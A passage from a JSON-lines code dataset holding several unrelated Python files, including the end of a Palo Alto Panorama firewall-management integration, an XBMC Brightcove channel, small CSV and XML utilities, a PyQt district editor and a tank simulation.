device_group_shared\n else:\n XPATH_OBJECTS = \"/config/devices/entry/device-group/entry[@name=\\'\" + DEVICE_GROUP + \"\\']/\"\n else:\n XPATH_OBJECTS = \"/config/devices/entry/vsys/entry[@name=\\'\" + VSYS + \"\\']/\" # ignore:\n\n # setting security rulebase xpath relevant to FW or panorama management\n if DEVICE_GROUP:\n device_group_shared = DEVICE_GROUP.lower()\n if DEVICE_GROUP == 'shared':\n XPATH_RULEBASE = \"/config/shared/\"\n DEVICE_GROUP = device_group_shared\n else:\n XPATH_RULEBASE = \"/config/devices/entry[@name='localhost.localdomain']/device-group/entry[@name=\\'\" + \\\n DEVICE_GROUP + \"\\']/\"\n else:\n XPATH_RULEBASE = f\"/config/devices/entry[@name=\\'localhost.localdomain\\']/vsys/entry[@name=\\'{VSYS}\\']/\"\n\n\ndef panorama_upload_content_update_file_command(args: dict):\n category = args.get('category')\n entry_id = args.get('entryID')\n file_path = demisto.getFilePath(entry_id)['path']\n file_name = demisto.getFilePath(entry_id)['name']\n shutil.copy(file_path, file_name)\n with open(file_name, 'rb') as file:\n params = {'type': 'import', 'category': category, 'key': API_KEY}\n response = http_request(uri=URL, method=\"POST\", headers={}, body={}, params=params, files={'file': file})\n human_readble = tableToMarkdown(\"Results\", t=response.get('response'))\n content_upload_info = {\n 'Message': response['response']['msg'],\n 'Status': response['response']['@status']\n }\n results = CommandResults(raw_response=response,\n readable_output=human_readble,\n outputs_prefix=\"Panorama.Content.Upload\",\n outputs_key_field=\"Status\",\n outputs=content_upload_info)\n\n shutil.rmtree(file_name, ignore_errors=True)\n return results\n\n\n@logger\ndef panorama_install_file_content_update(version: str, category: str, validity: str):\n \"\"\"\n More information about the API endpoint of that request can see here:\n https://docs.paloaltonetworks.com/pan-os/9-1/pan-os-panorama-api/pan-os-xml-api-request-types/run-operational-mode-commands-api.html#idb894d5f5-091f-4e08-b051-4c22cc9c660d\n \"\"\"\n if category == \"content\":\n params = {\n 'type': 'op',\n 'cmd': (\n f'<{category}>{validity}'\n 
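In panorama_upload_content_update_file_command above, shutil.rmtree(file_name, ignore_errors=True) targets a file, but rmtree only removes directories, so with ignore_errors=True it fails silently and the temporary copy is leaked. A standard-library cleanup sketch, not the integration's code:

import os

def remove_temp_copy(file_name):
    # rmtree() is for directory trees; a single copied file needs os.remove().
    try:
        os.remove(file_name)
    except FileNotFoundError:
        pass  # already gone, nothing to clean up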
f'{version}'),\n 'key': API_KEY\n }\n else:\n params = {\n 'type': 'op',\n 'cmd': (\n f'<{category}>{version}'\n f''), 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params\n )\n return result\n\n\ndef panorama_install_file_content_update_command(args: dict):\n version = args.get('version_name')\n category = args.get('category')\n validity = args['skip_validity_check']\n result = panorama_install_file_content_update(version, category, validity)\n\n if 'result' in result.get('response'):\n # installation has been given a jobid\n content_install_info = {\n 'JobID': result['response']['result']['job'],\n 'Status': 'Pending'\n }\n entry_context = {\"Panorama.Content.Install(val.JobID == obj.JobID)\": content_install_info}\n human_readable = tableToMarkdown('Result:', content_install_info, ['JobID', 'Status'], removeNull=True)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'EntryContext': entry_context\n })\n else:\n # no content install took place\n return_results(result['response']['msg'])\n\n\ndef main():\n try:\n args = demisto.args()\n params = demisto.params()\n additional_malicious = argToList(demisto.params().get('additional_malicious'))\n additional_suspicious = argToList(demisto.params().get('additional_suspicious'))\n initialize_instance(args=args, params=params)\n LOG(f'Command being called is: {demisto.command()}')\n\n # Remove proxy if not set to true in params\n handle_proxy()\n\n if demisto.command() == 'test-module':\n panorama_test()\n\n elif demisto.command() == 'panorama':\n panorama_command(args)\n\n elif demisto.command() == 'panorama-commit':\n panorama_commit_command()\n\n elif demisto.command() == 'panorama-commit-status':\n panorama_commit_status_command(args)\n\n elif demisto.command() == 'panorama-push-to-device-group':\n panorama_push_to_device_group_command()\n\n elif demisto.command() == 'panorama-push-status':\n panorama_push_status_command(**args)\n\n # Addresses commands\n elif demisto.command() == 'panorama-list-addresses':\n panorama_list_addresses_command(args)\n\n elif demisto.command() == 'panorama-get-address':\n panorama_get_address_command(args)\n\n elif demisto.command() == 'panorama-create-address':\n panorama_create_address_command(args)\n\n elif demisto.command() == 'panorama-delete-address':\n panorama_delete_address_command(args)\n\n # Address groups commands\n elif demisto.command() == 'panorama-list-address-groups':\n panorama_list_address_groups_command(args)\n\n elif demisto.command() == 'panorama-get-address-group':\n panorama_get_address_group_command(args)\n\n elif demisto.command() == 'panorama-create-address-group':\n panorama_create_address_group_command(args)\n\n elif demisto.command() == 'panorama-delete-address-group':\n panorama_delete_address_group_command(args.get('name'))\n\n elif demisto.command() == 'panorama-edit-address-group':\n panorama_edit_address_group_command(args)\n\n # Services commands\n elif demisto.command() == 'panorama-list-services':\n panorama_list_services_command(args.get('tag'))\n\n elif demisto.command() == 'panorama-get-service':\n panorama_get_service_command(args.get('name'))\n\n elif demisto.command() == 'panorama-create-service':\n panorama_create_service_command(args)\n\n elif demisto.command() == 'panorama-delete-service':\n panorama_delete_service_command(args.get('name'))\n\n # Service groups commands\n elif demisto.command() == 
'panorama-list-service-groups':\n panorama_list_service_groups_command(args.get('tags'))\n\n elif demisto.command() == 'panorama-get-service-group':\n panorama_get_service_group_command(args.get('name'))\n\n elif demisto.command() == 'panorama-create-service-group':\n panorama_create_service_group_command(args)\n\n elif demisto.command() == 'panorama-delete-service-group':\n panorama_delete_service_group_command(args.get('name'))\n\n elif demisto.command() == 'panorama-edit-service-group':\n panorama_edit_service_group_command(args)\n\n # Custom Url Category commands\n elif demisto.command() == 'panorama-get-custom-url-category':\n panorama_get_custom_url_category_command(args.get('name'))\n\n elif demisto.command() == 'panorama-create-custom-url-category':\n panorama_create_custom_url_category_command(args)\n\n elif demisto.command() == 'panorama-delete-custom-url-category':\n panorama_delete_custom_url_category_command(args.get('name'))\n\n elif demisto.command() == 'panorama-edit-custom-url-category':\n panorama_edit_custom_url_category_command(args)\n\n # URL Filtering capabilities\n elif demisto.command() == 'url':\n if USE_URL_FILTERING: # default is false\n panorama_get_url_category_command(url_cmd='url', url=args.get('url'),\n additional_suspicious=additional_suspicious,\n additional_malicious=additional_malicious)\n # do not error out\n\n elif demisto.command() == 'panorama-get-url-category':\n panorama_get_url_category_command(url_cmd='url', url=args.get('url'),\n additional_suspicious=additional_suspicious,\n additional_malicious=additional_malicious)\n\n elif demisto.command() == 'panorama-get-url-category-from-cloud':\n panorama_get_url_category_command(url_cmd='url-info-cloud', url=args.get('url'),\n additional_suspicious=additional_suspicious,\n additional_malicious=additional_malicious)\n\n elif demisto.command() == 'panorama-get-url-category-from-host':\n panorama_get_url_category_command(url_cmd='url-info-host', url=args.get('url'),\n additional_suspicious=additional_suspicious,\n additional_malicious=additional_malicious)\n\n # URL Filter\n elif demisto.command() == 'panorama-get-url-filter':\n panorama_get_url_filter_command(args.get('name'))\n\n elif demisto.command() == 'panorama-create-url-filter':\n panorama_create_url_filter_command(args)\n\n elif demisto.command() == 'panorama-edit-url-filter':\n panorama_edit_url_filter_command(args)\n\n elif demisto.command() == 'panorama-delete-url-filter':\n panorama_delete_url_filter_command(demisto.args().get('name'))\n\n # EDL\n elif demisto.command() == 'panorama-list-edls':\n panorama_list_edls_command()\n\n elif demisto.command() == 'panorama-get-edl':\n panorama_get_edl_command(demisto.args().get('name'))\n\n elif demisto.command() == 'panorama-create-edl':\n panorama_create_edl_command(args)\n\n elif demisto.command() == 'panorama-edit-edl':\n panorama_edit_edl_command(args)\n\n elif demisto.command() == 'panorama-delete-edl':\n panorama_delete_edl_command(demisto.args().get('name'))\n\n elif demisto.command() == 'panorama-refresh-edl':\n panorama_refresh_edl_command(args)\n\n # Registered IPs\n elif demisto.command() == 'panorama-register-ip-tag':\n panorama_register_ip_tag_command(args)\n\n elif demisto.command() == 'panorama-unregister-ip-tag':\n panorama_unregister_ip_tag_command(args)\n\n # Registered Users\n elif demisto.command() == 'panorama-register-user-tag':\n panorama_register_user_tag_command(args)\n\n elif demisto.command() == 'panorama-unregister-user-tag':\n 
panorama_unregister_user_tag_command(args)\n\n # Security Rules Managing\n elif demisto.command() == 'panorama-list-rules':\n panorama_list_rules_command(args.get('tag'))\n\n elif demisto.command() == 'panorama-move-rule':\n panorama_move_rule_command(args)\n\n # Security Rules Configuration\n elif demisto.command() == 'panorama-create-rule':\n panorama_create_rule_command(args)\n\n elif demisto.command() == 'panorama-custom-block-rule':\n panorama_custom_block_rule_command(args)\n\n elif demisto.command() == 'panorama-edit-rule':\n panorama_edit_rule_command(args)\n\n elif demisto.command() == 'panorama-delete-rule':\n panorama_delete_rule_command(args.get('rulename'))\n\n # Traffic Logs - deprecated\n elif demisto.command() == 'panorama-query-traffic-logs':\n panorama_query_traffic_logs_command(args)\n\n elif demisto.command() == 'panorama-check-traffic-logs-status':\n panorama_check_traffic_logs_status_command(args.get('job_id'))\n\n elif demisto.command() == 'panorama-get-traffic-logs':\n panorama_get_traffic_logs_command(args.get('job_id'))\n\n # Logs\n elif demisto.command() == 'panorama-query-logs':\n panorama_query_logs_command(args)\n\n elif demisto.command() == 'panorama-check-logs-status':\n panorama_check_logs_status_command(args.get('job_id'))\n\n elif demisto.command() == 'panorama-get-logs':\n panorama_get_logs_command(args)\n\n # Pcaps\n elif demisto.command() == 'panorama-list-pcaps':\n panorama_list_pcaps_command(args)\n\n elif demisto.command() == 'panorama-get-pcap':\n panorama_get_pcap_command(args)\n\n # Application\n elif demisto.command() == 'panorama-list-applications':\n panorama_list_applications_command(args.get('predefined'))\n\n # Test security policy match\n elif demisto.command() == 'panorama-security-policy-match':\n panorama_security_policy_match_command(args)\n\n # Static Routes\n elif demisto.command() == 'panorama-list-static-routes':\n panorama_list_static_routes_command(args)\n\n elif demisto.command() == 'panorama-get-static-route':\n panorama_get_static_route_command(args)\n\n elif demisto.command() == 'panorama-add-static-route':\n panorama_add_static_route_command(args)\n\n elif demisto.command() == 'panorama-delete-static-route':\n panorama_delete_static_route_command(args)\n\n # Firewall Upgrade\n # Check device software version\n elif demisto.command() == 'panorama-show-device-version':\n panorama_show_device_version_command(args.get('target'))\n\n # Download the latest content update\n elif demisto.command() == 'panorama-download-latest-content-update':\n panorama_download_latest_content_update_command(args.get('target'))\n\n # Download the latest content update\n elif demisto.command() == 'panorama-content-update-download-status':\n panorama_content_update_download_status_command(args)\n\n # Install the latest content update\n elif demisto.command() == 'panorama-install-latest-content-update':\n panorama_install_latest_content_update_command(args.get('target'))\n\n # Content update install status\n elif demisto.command() == 'panorama-content-update-install-status':\n panorama_content_update_install_status_command(args)\n\n # Check PAN-OS latest software update\n elif demisto.command() == 'panorama-check-latest-panos-software':\n panorama_check_latest_panos_software_command(args.get('target'))\n\n # Download target PAN-OS version\n elif demisto.command() == 'panorama-download-panos-version':\n panorama_download_panos_version_command(args)\n\n # PAN-OS download status\n elif demisto.command() == 'panorama-download-panos-status':\n 
panorama_download_panos_status_command(args)\n\n # PAN-OS software install\n elif demisto.command() == 'panorama-install-panos-version':\n panorama_install_panos_version_command(args)\n\n # PAN-OS install status\n elif demisto.command() == 'panorama-install-panos-status':\n panorama_install_panos_status_command(args)\n\n # Reboot Panorama Device\n elif demisto.command() == 'panorama-device-reboot':\n panorama_device_reboot_command(args.get('target'))\n\n # PAN-OS Set vulnerability to drop\n elif demisto.command() == 'panorama-block-vulnerability':\n panorama_block_vulnerability(args)\n\n # Get pre-defined threats list from the firewall\n elif demisto.command() == 'panorama-get-predefined-threats-list':\n panorama_get_predefined_threats_list_command(args.get('target'))\n\n elif demisto.command() == 'panorama-show-location-ip':\n panorama_show_location_ip_command(args.get('ip_address'))\n\n elif demisto.command() == 'panorama-get-licenses':\n panorama_get_license_command()\n\n elif demisto.command() == 'panorama-get-security-profiles':\n get_security_profiles_command(args.get('security_profile'))\n\n elif demisto.command() == 'panorama-apply-security-profile':\n apply_security_profile_command(**args)\n\n elif demisto.command() == 'panorama-get-ssl-decryption-rules':\n get_ssl_decryption_rules_command(**args)\n\n elif demisto.command() == 'panorama-get-wildfire-configuration':\n get_wildfire_configuration_command(**args)\n\n elif demisto.command() == 'panorama-get-wildfire-best-practice':\n get_wildfire_best_practice_command()\n\n elif demisto.command() == 'panorama-enforce-wildfire-best-practice':\n enforce_wildfire_best_practice_command(**args)\n\n elif demisto.command() == 'panorama-url-filtering-block-default-categories':\n url_filtering_block_default_categories_command(**args)\n\n elif demisto.command() == 'panorama-get-anti-spyware-best-practice':\n get_anti_spyware_best_practice_command()\n\n elif demisto.command() == 'panorama-get-file-blocking-best-practice':\n get_file_blocking_best_practice_command()\n\n elif demisto.command() == 'panorama-get-antivirus-best-practice':\n get_antivirus_best_practice_command()\n\n elif demisto.command() == 'panorama-get-vulnerability-protection-best-practice':\n get_vulnerability_protection_best_practice_command()\n\n elif demisto.command() == 'panorama-get-url-filtering-best-practice':\n get_url_filtering_best_practice_command()\n\n elif demisto.command() == 'panorama-create-antivirus-best-practice-profile':\n create_antivirus_best_practice_profile_command(**args)\n\n elif demisto.command() == 'panorama-create-anti-spyware-best-practice-profile':\n create_anti_spyware_best_practice_profile_command(**args)\n\n elif demisto.command() == 'panorama-create-vulnerability-best-practice-profile':\n create_vulnerability_best_practice_profile_command(**args)\n\n elif demisto.command() == 'panorama-create-url-filtering-best-practice-profile':\n create_url_filtering_best_practice_profile_command(**args)\n\n elif demisto.command() == 'panorama-create-file-blocking-best-practice-profile':\n create_file_blocking_best_practice_profile_command(**args)\n\n elif demisto.command() == 'panorama-create-wildfire-best-practice-profile':\n create_wildfire_best_practice_profile_command(**args)\n\n elif demisto.command() == 'panorama-show-user-id-interfaces-config':\n show_user_id_interface_config_command(args)\n\n elif demisto.command() == 'panorama-show-zones-config':\n show_zone_config_command(args)\n\n elif demisto.command() == 'panorama-list-configured-user-id-agents':\n 
list_configured_user_id_agents_command(args)\n\n elif demisto.command() == 'panorama-upload-content-update-file':\n return_results(panorama_upload_content_update_file_command(args))\n\n elif demisto.command() == 'panorama-install-file-content-update':\n panorama_install_file_content_update_command(args)\n\n else:\n raise NotImplementedError(f'Command {demisto.command()} was not implemented.')\n\n except Exception as err:\n return_error(str(err))\n\n finally:\n LOG.print_log()\n\n\nif __name__ in [\"__builtin__\", \"builtins\", '__main__']:\n main()\n","sub_path":"Packs/PAN-OS/Integrations/Panorama/Panorama.py","file_name":"Panorama.py","file_ext":"py","file_size_in_byte":280872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"528629967","text":"import time\nimport cgi\nimport datetime\nimport simplejson\nfrom channel import BaseChannel, ChannelException, ChannelMetaClass, STATUS_BAD, STATUS_GOOD, STATUS_UGLY\nfrom utils import *\nimport httplib\nimport xbmcplugin\nimport xbmc\n\ntry:\n from pyamf import remoting\n has_pyamf = True\nexcept ImportError:\n has_pyamf = False\n\n\nclass BrightcoveBaseChannel(BaseChannel):\n\n \"\"\"\n None of this works. All videos stop playing after 1 minute.\n\n \"\"\"\n is_abstract = True\n\n def get_swf_url(self):\n conn = httplib.HTTPConnection('c.brightcove.com')\n qsdata = dict(width=640, height=480, flashID=self.flash_experience_id,\n bgcolor=\"#000000\", playerID=self.player_id, publisherID=self.publisher_id,\n isSlim='true', wmode='opaque', optimizedContentLoad='true', autoStart='', debuggerID='')\n qsdata['@videoPlayer'] = self.video_id\n logging.debug(\"SWFURL: %s\" % (urllib.urlencode(qsdata),))\n conn.request(\"GET\", \"/services/viewer/federated_f9?&\" +\n urllib.urlencode(qsdata))\n resp = conn.getresponse()\n location = resp.getheader('location')\n base = location.split(\"?\", 1)[0]\n location = base.replace(\n \"BrightcoveBootloader.swf\", \"connection/ExternalConnection_2.swf\")\n self.swf_url = location\n\n def get_clip_info(self, player_id, video_id):\n conn = httplib.HTTPConnection(\"c.brightcove.com\")\n envelope = self.build_amf_request(player_id, video_id)\n conn.request(\"POST\", \"/services/amfgateway\", str(remoting.\n encode(envelope).read()), {'content-type': 'application/x-amf'})\n response = conn.getresponse().read()\n response = remoting.decode(\n response).bodies[0][1].body[0]['data']['videoDTO']\n logging.debug(response)\n return response\n\n def choose_rendition(self, renditions):\n maxrate = int(self.plugin.get_setting(\"max_bitrate\")) * 1024\n rends = [r for r in renditions if r['encodingRate'] < maxrate]\n if not rends:\n rends = renditions\n rends.sort(key=lambda r: r['encodingRate'])\n return rends[-1]\n\n def build_amf_request_body(self, player_id, video_id):\n return [\n player_id,\n {\n 'optimizeFeaturedContent': 1,\n 'featuredLineupFetchInfo': {\n 'fetchLevelEnum': 4,\n 'contentType': u'VideoLineup',\n 'childLimit': 100\n },\n 'lineupRefId': None,\n 'videoId': video_id,\n 'videoRefId': None,\n 'lineupId': None,\n 'fetchInfos': [\n {'fetchLevelEnum': 1,\n 'contentType': u'VideoLineup', 'childLimit': 100},\n {'grandchildLimit': 100, 'fetchLevelEnum': 3,\n 'contentType': u'VideoLineupList', 'childLimit': 100}\n ]\n }\n ]\n\n def build_amf_request(self, player_id, video_id):\n env = remoting.Envelope(amfVersion=0)\n env.bodies.append(\n (\n \"/2\",\n remoting.Request(\n target=\"com.brightcove.templating.TemplatingFacade.getContentForTemplateInstance\",\n 
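The main() dispatcher above chains dozens of elif branches on demisto.command(). The same routing can be table-driven; this sketch reuses a few command handlers named above and is an illustration, not the integration's actual structure:

COMMANDS = {
    'panorama-list-addresses': panorama_list_addresses_command,
    'panorama-get-address': panorama_get_address_command,
    'panorama-commit-status': panorama_commit_status_command,
    # ... one entry per supported command ...
}

def dispatch(command, args):
    handler = COMMANDS.get(command)
    if handler is None:
        raise NotImplementedError(f'Command {command} was not implemented.')
    return handler(args)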
body=self.build_amf_request_body(player_id, video_id),\n envelope=env\n )\n )\n )\n return env\n\n def find_ids(self, url):\n soup = BeautifulSoup(\n self.plugin.fetch(url, max_age=self.cache_timeout))\n self.flash_experience_id = soup.find(\"object\")['id']\n try:\n player_id = int(soup.find(\"object\").find(\"param\", {\n \"name\": \"playerID\"})['value'])\n except Exception:\n player_id = None\n\n try:\n video_id = int(soup.find(\n 'object').find(\"param\", {\"name\": \"@videoPlayer\"})['value'])\n except Exception:\n video_id = None\n\n return player_id, video_id\n","sub_path":"channels/brightcove.py","file_name":"brightcove.py","file_ext":"py","file_size_in_byte":4080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"145267420","text":"import os\n\naaa = 'v3sPDRTem_new_Lower.result'\na = ['v3sPDRTem2_new','v3sPDRTem3_new','v3sPDRTem4_new','v3sPDRTem5_new',\n 'v3sPDRTem7_new','v3sPDRTem9_new']\nb = '_Lower.result'\n\nf = open(aaa,'r')\ng = open('all2.csv','w')\n\nff_all = []\nos.system('wc '+aaa+' -l')\nfor c in a:\n os.system('wc '+c+b+' -l')\n ff_all.append(open(c+b,'r').readlines())\n\ni = 0\nfor l in f:\n ll=l.split(',')\n g.write(ll[0]+','+ll[1]+','+ll[2]+','+ll[3])\n for cc in range(len(a)):\n e = ff_all[cc][i]\n ee = e.split(',')\n g.write(','+ee[1]+','+ee[2]+','+ee[3])\n i+=1\n g.write('\\n')\n","sub_path":"new_result/integrate.py","file_name":"integrate.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"628160127","text":"import pandas as pd \nimport xml.etree.ElementTree as et\n\n\ntree = et.parse('/Users/alessandropollastri/Desktop/country_data.xml')\nroot = tree.getroot()\n\ndf_cols = ['country', 'neighbor', 'direction', 'number']\nrows = []\n\nfor country in root.iter('country'):\n this_country = country.get('name')\n for child in country: \n if child.tag == 'neighbor':\n name = child.attrib.get(\"name\")\n direction = child.attrib.get(\"direction\")\n number = child.text\n rows.append({'country': this_country,\n 'neighbor': name,\n 'direction': direction,\n 'number': number,\n })\n \n\nout_df = pd.DataFrame(rows, columns = df_cols)\nout_df \n \n","sub_path":"xml_parse.py","file_name":"xml_parse.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"466129082","text":"# coding: utf-8\r\nfrom PyQt4 import QtCore, QtGui, uic\r\n\r\nfrom core.database import Regions, Distinct\r\nfrom core.validate import *\r\n\r\n\r\nclass DistinctController:\r\n data = QtGui.QStandardItemModel() # Model that will hold our records\r\n\r\n def __init__(self):\r\n self.window = None # Form with the list of regions\r\n self.edit_form = None # Form for adding and editing districts\r\n self.insert = None # Flag so we know whether to update an existing record or add a new one (true/false)\r\n self.discinct = None # The current record will be stored here\r\n self.menu = None # Context menu\r\n self.regions = None # List of regions\r\n self.data.setColumnCount(2)\r\n\r\n # Form initialization\r\n def init_form(self, window):\r\n self.window = window\r\n self.window.setWindowTitle(u'Райони')\r\n self.window.table.setModel(self.data)\r\n self.window.table.setHorizontalHeader(QtGui.QHeaderView(QtCore.Qt.Horizontal, self.window.table))\r\n self.window.setFixedWidth(500)\r\n\r\n # Set up the context menu\r\n self.menu = QtGui.QMenu(self.window)\r\n a_add = 
self.menu.addAction(u'Додати')\r\n a_edit = self.menu.addAction(u'Редагувати')\r\n a_delete = self.menu.addAction(u'Видалити')\r\n\r\n self.window.connect(a_add, QtCore.SIGNAL('triggered()'), self.show_add_form)\r\n self.window.connect(a_edit, QtCore.SIGNAL('triggered()'), self.show_edit_form)\r\n self.window.connect(a_delete, QtCore.SIGNAL('triggered()'), self.delete)\r\n\r\n self.window.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)\r\n self.window.customContextMenuRequested.connect(self.show_context_menu)\r\n # End of context menu setup\r\n\r\n # Set the table headers\r\n def set_headers(self):\r\n self.data.setHeaderData(0, QtCore.Qt.Horizontal, QtCore.QString(u'Район'))\r\n self.data.setHeaderData(1, QtCore.Qt.Horizontal, QtCore.QString(u'Область'))\r\n # Stretch the columns to the table width\r\n self.window.table.horizontalHeader().setResizeMode(QtGui.QHeaderView.Stretch)\r\n\r\n # Get the list of all districts\r\n def get_data(self):\r\n self.data.clear()\r\n for distinct in Distinct.select().join(Regions).where(Distinct.region == Regions.id):\r\n row = self.data.rowCount()\r\n self.data.setItem(row, 0, QtGui.QStandardItem(distinct.name))\r\n self.data.setItem(row, 1, QtGui.QStandardItem(distinct.region.name))\r\n\r\n self.set_headers()\r\n\r\n # Show the context menu\r\n def show_context_menu(self, pos):\r\n self.menu.popup(self.window.mapToGlobal(pos))\r\n\r\n # Show the form for adding a new record\r\n def show_add_form(self):\r\n if not self.edit_form:\r\n self.edit_form = uic.loadUi('views/dict_edit_form_with_combobox.ui')\r\n self.edit_form.connect(self.edit_form.yes_no, QtCore.SIGNAL('accepted()'), self.commit)\r\n\r\n self.insert = True\r\n self.edit_form.name.setText('')\r\n self.edit_form.setWindowTitle(u'Новий район')\r\n self.edit_form.comboBox.clear()\r\n for regions in Regions.select():\r\n self.edit_form.comboBox.addItems(QtCore.QStringList(regions.name))\r\n\r\n self.edit_form.label_2.setText(u\"Область\")\r\n self.edit_form.show()\r\n\r\n # Show the form for editing a record\r\n def show_edit_form(self):\r\n if not self.edit_form:\r\n self.edit_form = uic.loadUi('views/dict_edit_form_with_combobox.ui')\r\n self.edit_form.connect(self.edit_form.yes_no, QtCore.SIGNAL('accepted()'), self.commit)\r\n\r\n self.insert = False\r\n self.edit_form.comboBox.clear()\r\n # Get the current record\r\n self.get_data_from_table()\r\n self.edit_form.label_2.setText(u'Область')\r\n self.edit_form.name.setText(self.discinct.name)\r\n self.edit_form.setWindowTitle(self.discinct.name)\r\n self.edit_form.show()\r\n\r\n # Save the data\r\n def commit(self):\r\n if self.edit_form.name.text() == '':\r\n QtGui.QMessageBox.information(self.edit_form, u'Ви не ввели дані', u'Введіть назву району')\r\n else:\r\n # Only letters of the Ukrainian alphabet are allowed\r\n if not is_only_ukrainian_letters(self.edit_form.name.text()):\r\n QtGui.QMessageBox.information(self.edit_form, u'Не вірний формат введення',\r\n u'Можна вводити тільки букви Українського алфавіту')\r\n else:\r\n self.region = Regions.get(Regions.name == self.edit_form.comboBox.currentText())\r\n\r\n # If we are creating a new record\r\n if self.insert:\r\n self.discinct = Distinct()\r\n self.discinct.name = self.edit_form.name.text()\r\n self.discinct.region = self.region\r\n self.discinct.save()\r\n else:\r\n # Update the record\r\n self.discinct.name = self.edit_form.name.text()\r\n self.discinct.region = self.region\r\n self.discinct.save()\r\n\r\n self.get_data()\r\n 
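The delete() and get_data_from_table() methods below repeat the same join-and-filter query to resolve the selected row. A sketch of factoring that lookup out; find_selected_distinct is a hypothetical method name, keeping the module's Python 2 idioms:

def find_selected_distinct(self):
    # Resolve the current table selection to its Distinct row via the Regions join.
    index = self.window.table.selectedIndexes()[0]
    name = unicode(self.window.table.model().data(index).toString())
    return (Distinct.select().join(Regions)
            .where((Distinct.region == Regions.id) & (Distinct.name == name))
            .get())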
                self.region = Regions.get(Regions.name == self.edit_form.comboBox.currentText())\r\n\r\n                # If we are creating a new record\r\n                if self.insert:\r\n                    self.distinct = Distinct()\r\n                    self.distinct.name = self.edit_form.name.text()\r\n                    self.distinct.region = self.region\r\n                    self.distinct.save()\r\n                else:\r\n                    # Update the existing record\r\n                    self.distinct.name = self.edit_form.name.text()\r\n                    self.distinct.region = self.region\r\n                    self.distinct.save()\r\n\r\n                self.get_data()\r\n                self.edit_form.close()\r\n\r\n    # Delete a record\r\n    def delete(self):\r\n        index = self.window.table.selectedIndexes()[0]\r\n        self.distinct = Distinct.select().join(Regions) \\\r\n            .where((Distinct.region == Regions.id) &\r\n                   (Distinct.name == unicode(self.window.table.model().data(index).toString()))).get()\r\n\r\n        reply = QtGui.QMessageBox.question(self.window, u'Видалення',\r\n                                           u'Ви дійсно бажаєте видалити ' + self.distinct.name + u\" район?\",\r\n                                           QtGui.QMessageBox.Yes, QtGui.QMessageBox.No)\r\n\r\n        if reply == QtGui.QMessageBox.Yes:\r\n            try:\r\n                self.distinct.delete_instance()\r\n                self.get_data()\r\n            except Exception:\r\n                QtGui.QMessageBox.information(self.edit_form, u'Помилка',\r\n                                              u'Помилка видалення')\r\n\r\n    # Read the currently selected record from the table\r\n    def get_data_from_table(self):\r\n        try:\r\n            index = self.window.table.selectedIndexes()[0]\r\n            self.distinct = Distinct.select().join(Regions) \\\r\n                .where((Distinct.region == Regions.id) &\r\n                       (Distinct.name == unicode(self.window.table.model().data(index).toString()))).get()\r\n\r\n            for regions in Regions.select():\r\n                self.edit_form.comboBox.addItems(QtCore.QStringList(regions.name))\r\n\r\n            self.edit_form.comboBox.setEditText(self.distinct.region.name)\r\n        except Exception:\r\n            QtGui.QMessageBox.information(self.edit_form, u'Помилка', u'Ви не вибрали дані')\r\n","sub_path":"controllers/distincts.py","file_name":"distincts.py","file_ext":"py","file_size_in_byte":7740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"466129082","text":"#!/usr/bin/env python\n\nimport copy\nimport logging\nimport optparse\nimport threading\nimport Queue\nimport time\n\nfrom configobj import ConfigObj\n\nfrom protolibs import ifaces\n#import protolibs.ifaces as ifaces  # this relies on a symlink back to protolibs\n\n\"\"\"\n@author Brad Reaves\n@version 0.1\nFebruary 2011\n@license GPL2\n\nThis module defines the necessary functions, constants, and variables to\nsimulate a simple fluid tank consisting of a single output valve and a\nsingle input pump, governed by one virtual device and monitored by a second\nvirtual device.\n\"\"\"\n\n#--------------- Parse Configuration Options ----------------\n\n#Required Items:\n#---Communication interface\n    #Type (udp, tcp, pipes, serial)\n    #Setup options (ports, filenames, destination addresses, etc)\n#---Virtual Device Setup\n\n#Simulation Details (constants, etc)\n#  physical constants\n#  simulation time\n#  variables and default values\nclass Simulation():\n    \"\"\"This class obtains simulation information from a configuration file,\n    sets up a simulation state, and provides a method to step the simulation\n    forward in time.\n    \"\"\"\n    def readConfig(self):\n        \"\"\"Opens and parses the configuration file in the local directory. The\n        results are available in self.config.\"\"\"\n        ## Open the config file\n        self.config = ConfigObj(infile='sims/rtutank/config', unrepr=True)  # MAKE READ ONLY\n        \"\"\"\n        self.config = dict()\n        self.config['iface'] = {\n            'typ': 'udp',\n            'sport': 9912,  # 9912-9949 are unassigned\n            'recipients': [('127.0.0.1', 9913)],\n            'timeout': .1\n        }\n        self.config['sim_state'] = {\n            'simtime': 0,    # time in the simulation\n            'pump': True,    # whether the pump is on or off\n            'valve': False,  # whether the valve is open or not\n            'pressure': 0    # current pressure in the tank (psi)\n        }\n        self.config['sim_constants'] = {\n            'valve_rate': -1,  # psi/sec\n            'pump_rate': 2     # psi/sec\n        }\n        \"\"\"\n
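    # NB: __init__ below reads a 'simiface' section, while the sample block above\n    # names that section 'iface'; the on-disk config file presumably uses the\n    # 'simiface' spelling, e.g.\n    #   simiface = {'typ': 'udp', 'sport': 9912, 'recipients': [('127.0.0.1', 9913)], 'timeout': .1}\n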
